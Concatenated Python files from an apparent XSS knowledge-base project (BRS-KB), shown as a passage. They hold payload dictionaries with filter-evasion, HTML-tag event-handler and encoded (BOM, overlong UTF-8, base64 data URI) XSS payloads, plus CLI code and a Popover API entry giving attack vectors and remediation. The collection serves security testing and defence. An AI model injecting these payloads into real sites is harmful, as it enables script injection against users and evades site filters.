        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_024": PayloadEntry(
        payload="<img src=x onerror =alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_025": PayloadEntry(
        payload="<img src=x onerror= alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_026": PayloadEntry(
        payload="<img src=x onerror = alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_027": PayloadEntry(
        payload="<img src=x onerror=`alert(1)`>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_028": PayloadEntry(
        payload="<img src=x o&#110;error=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_029": PayloadEntry(
        payload="<img src=x on&#101;rror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_030": PayloadEntry(
        payload="<img src=x &#111;nerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_031": PayloadEntry(
        payload="<img src=x onload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_032": PayloadEntry(
        payload="<img src=x onabort=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_033": PayloadEntry(
        payload="<img src=x oninvalid=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_034": PayloadEntry(
        payload="<select onfocus=alert(1) autofocus>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_035": PayloadEntry(
        payload="<textarea onfocus=alert(1) autofocus>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
}



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-04 12:00:00 UTC
Status: Created
Telegram: https://t.me/easyprotech

Get context command
"""

import argparse

from brs_kb import get_payloads_by_context, get_vulnerability_details
from brs_kb.exceptions import BRSKBError
from brs_kb.validation import validate_context_name

from .base import BaseCommand


class GetContextCommand(BaseCommand):
    """Get detailed information about a context"""

    def add_parser(self, subparsers: argparse._SubParsersAction) -> argparse.ArgumentParser:
        """Add parser for get-context command"""
        parser = subparsers.add_parser(
            "get-context", help="Get vulnerability details for a context"
        )
        parser.add_argument("context", help="Context name (e.g., html_content)")
        return parser

    def execute(self, args: argparse.Namespace) -> int:
        """Execute get-context command"""
        try:
            validated_context = validate_context_name(args.context)
            details = get_vulnerability_details(validated_context)

            print(f"XSS Context: {args.context.upper()}")
            print("=" * 50)
            print()

            print(f"Title: {details['title']}")
            print(f"Severity: {details['severity'].upper()}")
            print(f"CVSS Score: {details['cvss_score']}")
            print(f"Reliability: {details.get('reliability', 'unknown')}")
            print()

            if details.get("cwe"):
                print(f"CWE: {', '.join(details['cwe'])}")
            if details.get("owasp"):
                print(f"OWASP: {', '.join(details['owasp'])}")
            if details.get("tags"):
                print(f"  Tags: {', '.join(details['tags'])}")
            print()

            print(" Description:")
            print("-" * 30)
            description = details["description"].strip()
            if len(description) > 500:
                print(description[:500] + "...")
                print("   [truncated - use 'brs-kb get-context --full' for complete description]")
            else:
                print(description)
            print()

            # Show available payloads for this context
            payloads = get_payloads_by_context(args.context)
            if payloads:
                print(f"Available Payloads: {len(payloads)}")
                print("Top payloads:")
                for i, payload in enumerate(payloads[:3], 1):
                    payload_str = (
                        payload.payload
                        if hasattr(payload, "payload")
                        else payload.get("payload", "")
                    )
                    print(f"   {i}. {payload_str[:60]}...")
                print()

            return 0
        except BRSKBError as e:
            print(f"Error: {e.message}")
            if hasattr(e, "available_contexts"):
                print(f"Available contexts: {', '.join(e.available_contexts[:10])}")
            return 1
        except Exception as e:
            print(f"Error: {e}")
            return 1



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

HTML Tag XSS Payloads - Basic Tags A-F
"""

from ..models import PayloadEntry


HTML_TAG_PAYLOADS_AF = {
    # A tag variations
    "tag_a_1": PayloadEntry(
        payload="<a href=javascript:alert(1)>click</a>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Anchor with javascript href",
        tags=["html", "anchor", "javascript"],
        reliability="high",
    ),
    "tag_a_2": PayloadEntry(
        payload="<a href='#' onclick=alert(1)>click</a>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Anchor with onclick",
        tags=["html", "anchor", "onclick"],
        reliability="high",
    ),
    "tag_a_3": PayloadEntry(
        payload="<a href='#' onmouseover=alert(1)>hover</a>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Anchor with onmouseover",
        tags=["html", "anchor", "onmouseover"],
        reliability="high",
    ),
    # Abbr tag
    "tag_abbr": PayloadEntry(
        payload="<abbr onclick=alert(1)>XSS</abbr>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Abbr with onclick",
        tags=["html", "abbr", "onclick"],
        reliability="high",
    ),
    # Address tag
    "tag_address": PayloadEntry(
        payload="<address onclick=alert(1)>Address</address>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Address with onclick",
        tags=["html", "address", "onclick"],
        reliability="high",
    ),
    # Area tag
    "tag_area": PayloadEntry(
        payload="<map name=x><area href=javascript:alert(1)></map><img usemap=#x src=x>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Area with javascript href",
        tags=["html", "area", "map"],
        reliability="medium",
    ),
    # Article tag
    "tag_article": PayloadEntry(
        payload="<article onclick=alert(1)>Article</article>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Article with onclick",
        tags=["html", "article", "onclick", "html5"],
        reliability="high",
    ),
    # Aside tag
    "tag_aside": PayloadEntry(
        payload="<aside onclick=alert(1)>Aside</aside>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Aside with onclick",
        tags=["html", "aside", "onclick", "html5"],
        reliability="high",
    ),
    # Audio tag
    "tag_audio_1": PayloadEntry(
        payload="<audio src=x onerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Audio with onerror",
        tags=["html", "audio", "onerror"],
        reliability="high",
    ),
    "tag_audio_2": PayloadEntry(
        payload="<audio onloadstart=alert(1)><source src=x></audio>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Audio with onloadstart",
        tags=["html", "audio", "onloadstart"],
        reliability="high",
    ),
    "tag_audio_3": PayloadEntry(
        payload="<audio controls ontimeupdate=alert(1)><source src=valid.mp3></audio>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Audio with ontimeupdate",
        tags=["html", "audio", "ontimeupdate"],
        reliability="medium",
    ),
    # B tag
    "tag_b": PayloadEntry(
        payload="<b onclick=alert(1)>Bold</b>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Bold with onclick",
        tags=["html", "b", "onclick"],
        reliability="high",
    ),
    # Bdi tag
    "tag_bdi": PayloadEntry(
        payload="<bdi onclick=alert(1)>Text</bdi>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Bdi with onclick",
        tags=["html", "bdi", "onclick", "html5"],
        reliability="high",
    ),
    # Bdo tag
    "tag_bdo": PayloadEntry(
        payload="<bdo dir=ltr onclick=alert(1)>Text</bdo>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Bdo with onclick",
        tags=["html", "bdo", "onclick"],
        reliability="high",
    ),
    # Blockquote tag
    "tag_blockquote": PayloadEntry(
        payload="<blockquote onclick=alert(1)>Quote</blockquote>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Blockquote with onclick",
        tags=["html", "blockquote", "onclick"],
        reliability="high",
    ),
    # Body tag
    "tag_body_1": PayloadEntry(
        payload="<body onload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Body with onload",
        tags=["html", "body", "onload"],
        reliability="high",
    ),
    "tag_body_2": PayloadEntry(
        payload="<body onpageshow=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Body with onpageshow",
        tags=["html", "body", "onpageshow"],
        reliability="high",
    ),
    "tag_body_3": PayloadEntry(
        payload="<body onresize=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Body with onresize",
        tags=["html", "body", "onresize"],
        reliability="medium",
    ),
    "tag_body_4": PayloadEntry(
        payload="<body onscroll=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Body with onscroll",
        tags=["html", "body", "onscroll"],
        reliability="medium",
    ),
    "tag_body_5": PayloadEntry(
        payload="<body onbeforeunload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Body with onbeforeunload",
        tags=["html", "body", "onbeforeunload"],
        reliability="medium",
    ),
    "tag_body_6": PayloadEntry(
        payload="<body onerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Body with onerror",
        tags=["html", "body", "onerror"],
        reliability="medium",
    ),
    "tag_body_7": PayloadEntry(
        payload="<body onhashchange=alert(1)><a href=#x>click</a>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Body with onhashchange",
        tags=["html", "body", "onhashchange"],
        reliability="high",
    ),
    # Button tag
    "tag_button_1": PayloadEntry(
        payload="<button onclick=alert(1)>Click</button>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Button with onclick",
        tags=["html", "button", "onclick"],
        reliability="high",
    ),
    "tag_button_2": PayloadEntry(
        payload="<button onfocus=alert(1) autofocus>X</button>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Button with autofocus onfocus",
        tags=["html", "button", "autofocus", "onfocus"],
        reliability="high",
    ),
    "tag_button_3": PayloadEntry(
        payload="<form><button formaction=javascript:alert(1)>X</button></form>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Button with formaction javascript",
        tags=["html", "button", "formaction"],
        reliability="high",
    ),
    # Canvas tag
    "tag_canvas": PayloadEntry(
        payload="<canvas onclick=alert(1)>Canvas</canvas>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Canvas with onclick",
        tags=["html", "canvas", "onclick", "html5"],
        reliability="high",
    ),
    # Caption tag
    "tag_caption": PayloadEntry(
        payload="<table><caption onclick=alert(1)>Caption</caption></table>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Caption with onclick",
        tags=["html", "caption", "table", "onclick"],
        reliability="high",
    ),
    # Cite tag
    "tag_cite": PayloadEntry(
        payload="<cite onclick=alert(1)>Citation</cite>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Cite with onclick",
        tags=["html", "cite", "onclick"],
        reliability="high",
    ),
    # Code tag
    "tag_code": PayloadEntry(
        payload="<code onclick=alert(1)>Code</code>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Code with onclick",
        tags=["html", "code", "onclick"],
        reliability="high",
    ),
    # Col tag
    "tag_col": PayloadEntry(
        payload="<table><colgroup><col onclick=alert(1)></colgroup></table>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Col with onclick",
        tags=["html", "col", "table", "onclick"],
        reliability="medium",
    ),
    # Data tag
    "tag_data": PayloadEntry(
        payload="<data value=1 onclick=alert(1)>One</data>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Data with onclick",
        tags=["html", "data", "onclick", "html5"],
        reliability="high",
    ),
    # Datalist tag
    "tag_datalist": PayloadEntry(
        payload="<input list=x><datalist id=x onclick=alert(1)><option>XSS</option></datalist>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Datalist with onclick",
        tags=["html", "datalist", "onclick", "html5"],
        reliability="medium",
    ),
    # Dd tag
    "tag_dd": PayloadEntry(
        payload="<dl><dd onclick=alert(1)>Definition</dd></dl>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Dd with onclick",
        tags=["html", "dd", "onclick"],
        reliability="high",
    ),
    # Del tag
    "tag_del": PayloadEntry(
        payload="<del onclick=alert(1)>Deleted</del>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Del with onclick",
        tags=["html", "del", "onclick"],
        reliability="high",
    ),
    # Details tag
    "tag_details_1": PayloadEntry(
        payload="<details ontoggle=alert(1) open>Details</details>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Details with ontoggle",
        tags=["html", "details", "ontoggle", "html5"],
        reliability="high",
    ),
    "tag_details_2": PayloadEntry(
        payload="<details open onclick=alert(1)>Details</details>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Details with onclick",
        tags=["html", "details", "onclick", "html5"],
        reliability="high",
    ),
    # Dfn tag
    "tag_dfn": PayloadEntry(
        payload="<dfn onclick=alert(1)>Definition</dfn>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Dfn with onclick",
        tags=["html", "dfn", "onclick"],
        reliability="high",
    ),
    # Dialog tag
    "tag_dialog": PayloadEntry(
        payload="<dialog open onclick=alert(1)>Dialog</dialog>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Dialog with onclick",
        tags=["html", "dialog", "onclick", "html5"],
        reliability="high",
    ),
    # Div tag
    "tag_div": PayloadEntry(
        payload="<div onclick=alert(1)>Div</div>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Div with onclick",
        tags=["html", "div", "onclick"],
        reliability="high",
    ),
    # Dl tag
    "tag_dl": PayloadEntry(
        payload="<dl onclick=alert(1)><dt>Term</dt><dd>Def</dd></dl>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Dl with onclick",
        tags=["html", "dl", "onclick"],
        reliability="high",
    ),
    # Dt tag
    "tag_dt": PayloadEntry(
        payload="<dl><dt onclick=alert(1)>Term</dt></dl>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Dt with onclick",
        tags=["html", "dt", "onclick"],
        reliability="high",
    ),
    # Em tag
    "tag_em": PayloadEntry(
        payload="<em onclick=alert(1)>Emphasis</em>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Em with onclick",
        tags=["html", "em", "onclick"],
        reliability="high",
    ),
    # Embed tag
    "tag_embed": PayloadEntry(
        payload="<embed src=javascript:alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Embed with javascript src",
        tags=["html", "embed", "javascript"],
        reliability="medium",
    ),
    # Fieldset tag
    "tag_fieldset": PayloadEntry(
        payload="<fieldset onclick=alert(1)>Fieldset</fieldset>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Fieldset with onclick",
        tags=["html", "fieldset", "onclick"],
        reliability="high",
    ),
    # Figcaption tag
    "tag_figcaption": PayloadEntry(
        payload="<figure><figcaption onclick=alert(1)>Caption</figcaption></figure>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Figcaption with onclick",
        tags=["html", "figcaption", "onclick", "html5"],
        reliability="high",
    ),
    # Figure tag
    "tag_figure": PayloadEntry(
        payload="<figure onclick=alert(1)>Figure</figure>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Figure with onclick",
        tags=["html", "figure", "onclick", "html5"],
        reliability="high",
    ),
    # Footer tag
    "tag_footer": PayloadEntry(
        payload="<footer onclick=alert(1)>Footer</footer>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.0,
        description="Footer with onclick",
        tags=["html", "footer", "onclick", "html5"],
        reliability="high",
    ),
}



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-04 12:00:00 UTC
Status: Refactored
Telegram: https://t.me/easyprotech

BRS-KB Command Line Interface
Refactored to use command pattern
"""

import sys
from typing import List, Optional

from .parser import create_parser


class BRSKBCLI:
    """BRS-KB Command Line Interface"""

    def __init__(self):
        self.parser, self.commands = create_parser()

    def run(self, args: Optional[List[str]] = None) -> int:
        """Run CLI with given arguments"""
        try:
            parsed_args = self.parser.parse_args(args)

            if not parsed_args.command:
                self.parser.print_help()
                return 1

            # Get command instance
            if parsed_args.command in self.commands:
                return self.commands[parsed_args.command].execute(parsed_args)

            self.parser.print_help()
            return 1

        except KeyboardInterrupt:
            print("\nOperation cancelled by user")
            return 1
        except Exception as e:
            from brs_kb.exceptions import BRSKBError

            if isinstance(e, BRSKBError):
                print(f"Error: {e.message}")
                if hasattr(e, "context"):
                    print(f"Context: {e.context}")
                if hasattr(e, "details"):
                    print(f"Details: {e.details}")
            else:
                print(f"Error: {e}")
            return 1


def main():
    """Main entry point"""
    cli = BRSKBCLI()
    sys.exit(cli.run())



#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Knowledge Base: HTML5 Popover API XSS
"""

DETAILS = {
    "title": "Cross-Site Scripting (XSS) via HTML5 Popover API",
    "severity": "high",
    "cvss_score": 7.5,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
    "reliability": "high",
    "cwe": ["CWE-79"],
    "owasp": ["A03:2021"],
    "tags": ["xss", "html5", "popover", "modern", "chrome-114"],
    "description": """
HTML5 Popover API (Chrome 114+, Safari 17+) provides native popover functionality without JavaScript.
XSS vulnerabilities occur when user input is reflected in popover content without sanitization.

SEVERITY: HIGH
Modern API with growing adoption. Popover content is rendered in top layer, bypassing some containment.
""",
    "attack_vector": """
POPOVER ATTRIBUTE INJECTION:
<div popover id="user-input"><script>alert(1)</script></div>
<button popovertarget="user-input">Show</button>

POPOVER WITH EVENT HANDLERS:
<div popover id="x" onshow=alert(1)>Content</div>

POPOVER CONTENT INJECTION:
<div popover><img src=x onerror=alert(1)></div>

POPOVER TARGET INJECTION:
<div popover id="<script>alert(1)</script>">Content</div>

POPOVER SHOW METHOD:
element.showPopover();
// If element.innerHTML contains user input

POPOVER TOGGLE:
element.togglePopover();
// XSS if content is user-controlled

POPOVER AUTO ATTRIBUTE:
<div popover="auto" id="x"><svg onload=alert(1)></svg></div>
""",
    "remediation": """
DEFENSE:

1. Sanitize all user input before setting popover content
2. Use textContent instead of innerHTML for popover content
3. Validate popover IDs and targets
4. Implement CSP headers
5. Use DOMPurify for HTML sanitization

SAFE PATTERN:
const popover = document.createElement('div');
popover.setAttribute('popover', '');
popover.textContent = userInput;  // Safe
popover.id = sanitizeId(userInput);

SANITIZATION:
import DOMPurify from 'dompurify';
popover.innerHTML = DOMPurify.sanitize(userInput);

OWASP REFERENCES:
- CWE-79: Cross-site Scripting
- HTML5 Security Cheat Sheet
- Popover API Specification
""",
}



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Encoding Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


ENCODING_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "encoding_038": PayloadEntry(
        payload="<style>\\53 cript{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_039": PayloadEntry(
        payload="<style>\\4F nload{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_040": PayloadEntry(
        payload="<style>/**/a/**/l/**/e/**/r/**/t/**/{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_041": PayloadEntry(
        payload="<style>al/**/ert{color:red}</style>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_042": PayloadEntry(
        payload='<style>@import/**/"javascript:alert(1)"</style>',
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_043": PayloadEntry(
        payload='<style>@import "\\6A \\61 \\76 \\61 \\73 \\63 \\72 \\69 \\70 \\74 \\3A \\61 \\6C \\65 \\72 \\74 \\28 \\31 \\29"</style>',
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_044": PayloadEntry(
        payload='<style>body{background:url("\\6A \\61 \\76 \\61 \\73 \\63 \\72 \\69 \\70 \\74 \\3A \\61 \\6C \\65 \\72 \\74 \\28 \\31 \\29")}</style>',
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_045": PayloadEntry(
        payload="%F0%80%80%BCscript%F0%80%80%BEalert(1)%F0%80%80%BC/script%F0%80%80%BE",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_046": PayloadEntry(
        payload="%FF%FE%3C%00s%00c%00r%00i%00p%00t%00%3E%00a%00l%00e%00r%00t%00(%001%00)%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E%00",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_047": PayloadEntry(
        payload="%FE%FF%00%3C%00s%00c%00r%00i%00p%00t%00%3E%00a%00l%00e%00r%00t%00(%001%00)%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_048": PayloadEntry(
        payload="%FF%FE%00%00%3C%00%00%00s%00%00%00c%00%00%00r%00%00%00i%00%00%00p%00%00%00t%00%00%00%3E%00%00%00",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_049": PayloadEntry(
        payload="%C0%BCimg src=x onerror=alert(1)%C0%BE",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_050": PayloadEntry(
        payload="%E0%80%BCsvg onload=alert(1)%E0%80%BE",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_051": PayloadEntry(
        payload="%EF%BB%BF<script>alert(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_052": PayloadEntry(
        payload="%FF%FE<script>alert(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_053": PayloadEntry(
        payload="%FE%FF<script>alert(1)</script>",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_054": PayloadEntry(
        payload="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_055": PayloadEntry(
        payload="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_056": PayloadEntry(
        payload="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_057": PayloadEntry(
        payload="data:application/javascript;base64,YWxlcnQoMSk=",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_058": PayloadEntry(
        payload="data:text/javascript;base64,YWxlcnQoMSk=",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_059": PayloadEntry(
        payload="data:application/x-javascript;base64,YWxlcnQoMSk=",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_060": PayloadEntry(
        payload="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_061": PayloadEntry(
        payload="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_062": PayloadEntry(
        payload="data:text/html;base64,PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_063": PayloadEntry(
        payload="data:text/html;charset=utf-8;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_064": PayloadEntry(
        payload="data:text/html;charset=utf-16;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_065": PayloadEntry(
        payload="data:text/plain;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_066": PayloadEntry(
        payload="data:application/octet-stream;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
    "encoding_067": PayloadEntry(
        payload="%3C&#x69;mg src=x onerror=alert(1)%3E",
        contexts=["html_content", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Encoding payload",
        tags=["encoding", "unicode", "hex"],
        waf_evasion=False,
    ),
